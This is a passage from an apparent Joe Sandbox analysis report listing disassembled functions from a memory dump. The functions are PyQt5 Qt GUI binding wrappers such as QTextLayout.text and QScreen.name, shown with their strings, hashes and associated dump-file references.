Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?windowFlags@Qt@@@@State@States@WindowWindow@@malloc
String ID: QWindow$windowStates$windowStates(self) -> Qt.WindowStates
API String ID: 1775758369-1511991782
Opcode ID: 825799bd466c0ee590184e4f0af9fa1dfd37a07b5e19c3150ea2d39bdba76108
Instruction ID: a13eefaf25b6953ed05fe41eff638d6a25f744e6899154de740578278996ab39
Opcode Fuzzy Hash: 825799bd466c0ee590184e4f0af9fa1dfd37a07b5e19c3150ea2d39bdba76108
Instruction Fuzzy Hash: 461109B5B08A4681FB50DB65E8486A937A8FB95B94FA180B6CE5D03320CF7CD589C740

Function 00007FFB9A2EFB40 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32

?text@QTextLayout@@QEBA?AVQString@@XZ.QT5GUI ref: 00007FFB9A2EFB98

Strings

QTextLayout, xrefs: 00007FFB9A2EFBD7
text(self) -> str, xrefs: 00007FFB9A2EFBC4
text, xrefs: 00007FFB9A2EFBD0

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?text@Layout@@String@@Textmalloc
String ID: QTextLayout$text$text(self) -> str
API String ID: 2459105123-1337286841
Opcode ID: dc49fa71e1f572835633aea6f5e9734dda4afc752d4180fa8c930e08fbcc0c62
Instruction ID: b421336eef139282573b2e023064742cce12ba8ed781fc1e82730f6541884537
Opcode Fuzzy Hash: dc49fa71e1f572835633aea6f5e9734dda4afc752d4180fa8c930e08fbcc0c62
Instruction Fuzzy Hash: 89115BB5B08A4681EB10DF35E8586A933A8FB55B84FA180B6CD4C03320CF7DD549C380

Function 00007FFB9A353B80 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32

?end@QTextFrame@@QEBA?AViterator@1@XZ.QT5GUI ref: 00007FFB9A353BD8

Strings

QTextFrame, xrefs: 00007FFB9A353C17
end, xrefs: 00007FFB9A353C10
end(self) -> QTextFrame.iterator, xrefs: 00007FFB9A353C04

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?end@Frame@@TextViterator@1@malloc
String ID: QTextFrame$end$end(self) -> QTextFrame.iterator
API String ID: 799124393-352633679
Opcode ID: afe4439b42dd42eaf82e3228133bf4783a2b7293ef2abb54e4fe7b690466bf96
Instruction ID: 14353d9ea09e13d613680ef74053614aa1c45b5c64b43a4ea107f220dbd62882
Opcode Fuzzy Hash: afe4439b42dd42eaf82e3228133bf4783a2b7293ef2abb54e4fe7b690466bf96
Instruction Fuzzy Hash: DE1109B5B08A8681EB209F75E8596A937A8FB55B84FA180B6CD1D43320DF7DD549C340

Function 00007FFB9A2EBB60 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32

?font@QTextItem@@QEBA?AVQFont@@XZ.QT5GUI ref: 00007FFB9A2EBBB8

Strings

QTextItem, xrefs: 00007FFB9A2EBBF7
font(self) -> QFont, xrefs: 00007FFB9A2EBBE4
font, xrefs: 00007FFB9A2EBBF0

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?font@Font@@Item@@Textmalloc
String ID: QTextItem$font$font(self) -> QFont
API String ID: 2671846617-3637501433
Opcode ID: 381055a806b463bbe28e715f80afa58fb67c021fa57ae412a2c41cb20e192a4a
Instruction ID: 5a379b79ee3cef3c252bd368757a1b870fed6d26044c6ac18a85450e35a61fb3
Opcode Fuzzy Hash: 381055a806b463bbe28e715f80afa58fb67c021fa57ae412a2c41cb20e192a4a
Instruction Fuzzy Hash: 21111BB5B08A46C1EB10DF75E8986A933A8FB95B84FA140B6CD4D17320CF7DE549C340

Function 00007FFB9A329BE0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32

?version@QSurfaceFormat@@QEBA?AU?$QPair@HH@@XZ.QT5GUI ref: 00007FFB9A329C38

Strings

version, xrefs: 00007FFB9A329C70
QSurfaceFormat, xrefs: 00007FFB9A329C77
version(self) -> Tuple[int, int], xrefs: 00007FFB9A329C64

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?version@Format@@Pair@Surfacemalloc
String ID: QSurfaceFormat$version$version(self) -> Tuple[int, int]
API String ID: 746091024-3854954085
Opcode ID: ddb217ff52f55257a8aecab5a762428cc64df08e392af8f26ac18f1df8d43aa9
Instruction ID: 96c0928f14e97aed5a6f1fc56d0d8c81b7c1b41cb064075aba8b708c10fd5c4c
Opcode Fuzzy Hash: ddb217ff52f55257a8aecab5a762428cc64df08e392af8f26ac18f1df8d43aa9
Instruction Fuzzy Hash: 981135B5A08B4681EB20CB75E8586A933A8FB95B84FA180B6CE0D03320DF7CE549C340

Function 00007FFB9A33DBD0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32

?end@QTextBlock@@QEBA?AViterator@1@XZ.QT5GUI ref: 00007FFB9A33DC28

Strings

end, xrefs: 00007FFB9A33DC60
end(self) -> QTextBlock.iterator, xrefs: 00007FFB9A33DC54
QTextBlock, xrefs: 00007FFB9A33DC67

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?end@Block@@TextViterator@1@malloc
String ID: QTextBlock$end$end(self) -> QTextBlock.iterator
API String ID: 947878495-50235508
Opcode ID: 859c69c65888e48bd8124ba8445ffbc02f164d2bfe1870fd0e24e7d2d83cff90
Instruction ID: 9e78e20cbcfceabe72c2b51d508acee493903cf958c2ac9bbf620f5c3ebe42de
Opcode Fuzzy Hash: 859c69c65888e48bd8124ba8445ffbc02f164d2bfe1870fd0e24e7d2d83cff90
Instruction Fuzzy Hash: AC1109B5B08A46C1EB109F75E8586A937A8FB95B84FA180B6CD0D07320CF7CD549C340

Function 00007FFB9A331C60 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32

?fontMetrics@QPainter@@QEBA?AVQFontMetrics@@XZ.QT5GUI ref: 00007FFB9A331CB8

Strings

fontMetrics, xrefs: 00007FFB9A331CF0
QPainter, xrefs: 00007FFB9A331CF7
fontMetrics(self) -> QFontMetrics, xrefs: 00007FFB9A331CE4

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?fontFontMetrics@Metrics@@Painter@@malloc
String ID: QPainter$fontMetrics$fontMetrics(self) -> QFontMetrics
API String ID: 829657008-3622236266
Opcode ID: 2f66e4e208b88cc98845febf2948b268b326f0505c2c14a63dbdc0e836e9933f
Instruction ID: 5d8967129d7c88a93becd046772dc846a91ac633cb2aa0c282fa4cf1fbaa97ca
Opcode Fuzzy Hash: 2f66e4e208b88cc98845febf2948b268b326f0505c2c14a63dbdc0e836e9933f
Instruction Fuzzy Hash: C51139B5B18A4681EB10DF35E8587A933A8FB94B94FA180B6CE0D07320CF7CD549C340

Function 00007FFB9A305C90 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32

?name@QScreen@@QEBA?AVQString@@XZ.QT5GUI ref: 00007FFB9A305CE8

Strings

QScreen, xrefs: 00007FFB9A305D27
name, xrefs: 00007FFB9A305D20
name(self) -> str, xrefs: 00007FFB9A305D14

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?name@Screen@@String@@malloc
String ID: QScreen$name$name(self) -> str
API String ID: 2907677463-2722744029
Opcode ID: 808b6d2681690f4f992a1d679ea47f516de526880c727076be18ff47e7e6e9ca
Instruction ID: 903c5c24ba6928f53a6c5ce0221fefc0f16e67fd81573db47be23177a01f26e9
Opcode Fuzzy Hash: 808b6d2681690f4f992a1d679ea47f516de526880c727076be18ff47e7e6e9ca
Instruction Fuzzy Hash: EE115BB5B08A56C1EB20DF75E8586A933A8FB95B84FA140B6CD4D03320CF7CD589C340

Function 00007FFB9A323C30 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32

?pageBreakPolicy@QTextBlockFormat@@QEBA?AV?$QFlags@W4PageBreakFlag@QTextFormat@@@@XZ.QT5GUI ref: 00007FFB9A323C88

Strings

QTextBlockFormat, xrefs: 00007FFB9A323CC7
pageBreakPolicy(self) -> QTextFormat.PageBreakFlags, xrefs: 00007FFB9A323CB4
pageBreakPolicy, xrefs: 00007FFB9A323CC0

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: BreakText$?pageBlockFlag@Flags@Format@@Format@@@@PagePolicy@malloc
String ID: QTextBlockFormat$pageBreakPolicy$pageBreakPolicy(self) -> QTextFormat.PageBreakFlags
API String ID: 4265840606-1351799286
Opcode ID: 6fc666d3334ef3762203221e109850ef8c078ec5d1864fc44b63faab146de22a
Instruction ID: 0119d63ff00ba524330fd4844d0f5f0d53b7ade8fefc661278c48902cdb40771
Opcode Fuzzy Hash: 6fc666d3334ef3762203221e109850ef8c078ec5d1864fc44b63faab146de22a
Instruction Fuzzy Hash: 50115BB5B08A46C1EB20CF75E8486A933A8FB95B84FA180B6CE0C03320DF7DD549C340

Function 00007FFB9A35BC40 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32

?toEulerAngles@QQuaternion@@QEBA?AVQVector3D@@XZ.QT5GUI ref: 00007FFB9A35BC98

Strings

QQuaternion, xrefs: 00007FFB9A35BCD7
toEulerAngles, xrefs: 00007FFB9A35BCD0
toEulerAngles(self) -> QVector3D, xrefs: 00007FFB9A35BCC4

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
